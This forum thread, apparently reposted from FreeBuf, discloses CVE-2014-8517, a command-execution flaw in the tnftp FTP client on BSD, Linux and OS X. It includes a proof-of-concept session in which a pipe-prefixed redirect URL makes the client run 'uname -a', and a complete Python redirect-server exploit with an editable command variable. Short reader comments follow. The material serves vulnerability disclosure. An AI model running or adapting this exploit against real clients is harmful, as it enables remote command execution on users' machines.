小安 发表于 2014-10-30 11:23:14

FTP曝严重远程执行漏洞,影响多个版本Linux(附检测脚本)

本帖最后由 小安 于 2014-10-30 11:24 编辑

10月28日,一份公开的邮件中曝出FTP远程执行命令漏洞,漏洞影响到的Linux系统包括:Fedora, Debian, NetBSD, FreeBSD, OpenBSD, 甚至影响到了苹果的OS X操作系统的最新版本Yosemite 10.10。NetBSD的一位开发人员(Jared McNeill)证实了这个漏洞可已通过tnftp让WEB服务器远程执行恶意命令,并且此漏洞已被编号为CVE-2014-8517 :    a20$ pwd
   /var/www/cgi-bin
   a20$ ls -l
   total 4
   -rwxr-xr-x1 rootwheel159 Oct 14 02:02 redirect
   -rwxr-xr-x1 rootwheel178 Oct 14 01:54 |uname -a
   a20$ cat redirect
   #!/bin/sh
   echo 'Status: 302 Found'
   echo 'Content-Type: text/html'
   echo 'Connection: keep-alive'
   echo 'Location: http://192.168.2.19/cgi-bin/|uname%20-a'
   echo
   a20$
   a20$ ftp http://localhost/cgi-bin/redirect
   Trying ::1:80 ...
   ftp: Can't connect to `::1:80': Connection refused
   Trying 127.0.0.1:80 ...
   Requesting http://localhost/cgi-bin/redirect
   Redirected to http://192.168.2.19/cgi-bin/|uname%20-a
   Requesting http://192.168.2.19/cgi-bin/|uname%20-a
       32      101.46 KiB/s
   32 bytes retrieved in 00:00 (78.51 KiB/s)
   NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36
   ADT 2014
   Jared () Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIE
   BOARD evbarm
   a20$漏洞影响范围及公告Debian, Red Hat, Gentoo, Novell (SuSE Linux), DragonFly, FreeBSD, OpenBSD, and Apple等系统开发商已经意识到了此漏洞的危害,其中Debian, Red Hat, Gnetoo and Novell已经发出了漏洞公告:http://image.3001.net/images/20141030/14146016095715.png!small
漏洞检测脚本(请勿用于非法用途)#!/usr/bin/env python

"""
Sample OSX/BSD FTP client exploit. Written because ISO policies were doing
my head in. To exploit, edit the value of the cmd variable, then run the
script. To test:

        ftp http://<myserver>/foo

And you should see the command executed.

All wrongs reversed - @stevelord
"""

import Basehttperver
import sys
import socket
import urllib

hostname = socket.getfqdn() # Set this to your IP if you have no FQDN
port = 8000 # Set this to the port you want to run this on
cmd = "uname -a; echo You probably shouldnt execute random code from the Internet. Just saying."

cmd = urllib.quote(cmd)
redir = "http://" + hostname + ":" + str(port) + "/cgi-bin/|" + cmd

class RedirectHandler(Basehttperver.BaseHTTPRequestHandler):
        def do_GET(s):
                if cmd in s.path:
                        s.send_response(200)
                        s.end_headers()
                else:
                        s.send_response(302)
                        s.send_header("Location", redir)
                        s.end_headers()

if __name__ == "__main__":
        print "redirecting to,", redir
        server_class = Basehttperver.httperver
        httpd = server_class((hostname, port), RedirectHandler)
        try:
                httpd.serve_forever()
                print "Started serving."
        except KeyboardInterrupt:
                pass
        httpd.server_close()
        print "\nStopped serving."
解决方案和更详细的内容参见:http://seclists.org/oss-sec/2014/q4/459 http://seclists.org/oss-sec/2014/q4/464 http://seclists.org/oss-sec/2014/q4/460转载自 FreeBuf.com

颜筱诺 发表于 2014-10-30 18:51:38

- - 真是 不安全啊。。。

毛毛虫 发表于 2014-10-30 22:02:33

最近好多。。。。:o

csadsl 发表于 2014-10-31 13:54:49

最近是漏洞大批露啊

blck 发表于 2014-10-31 21:37:39

又是远程命令执行

蟹老板 发表于 2014-11-1 12:25:37

Freebuf越来越吊了。

冰山 发表于 2014-11-3 00:24:32

什么都不安去
页: [1]
查看完整版本: FTP曝严重远程执行漏洞,影响多个版本Linux(附检测脚本)